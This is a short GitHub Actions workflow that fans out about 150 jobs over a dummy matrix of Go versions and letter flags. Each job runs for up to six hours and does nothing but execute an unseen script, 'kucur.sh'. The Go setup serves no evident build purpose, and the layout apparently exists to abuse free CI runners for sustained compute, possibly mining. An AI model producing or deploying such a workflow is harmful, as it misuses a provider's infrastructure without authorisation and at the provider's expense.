name: ONEDEV_Gits
on: [push, pull_request]
jobs:
  build:
    name: ONEDEV_Github
    runs-on: ubuntu-18.04
    strategy:
      max-parallel: 100
      fail-fast: false
      matrix:
        go: [1.1, 1.2, 1.3, 1.4, 1.5, 1.6, 1.7, 1.8, 1.9, 1.10, 1.11, 1.12, 1.13, 1.14, 1.15]
        flag: [A, B, C, D, E, F, G, H, I, J]
    timeout-minutes: 360
    env:
        NUM_JOBS: 100
        JOB: ${{ matrix.go }}
    steps:
    - name: Set up Go ${{ matrix.go }}
      uses: actions/setup-go@v1
      with:
        go-version: ${{ matrix.go }}
      id: go
    - name: Setup
      uses: actions/checkout@v1
    - name: runner_go
      run: |
        chmod +x "${GITHUB_WORKSPACE}/kucur.sh"
        "${GITHUB_WORKSPACE}/kucur.sh"
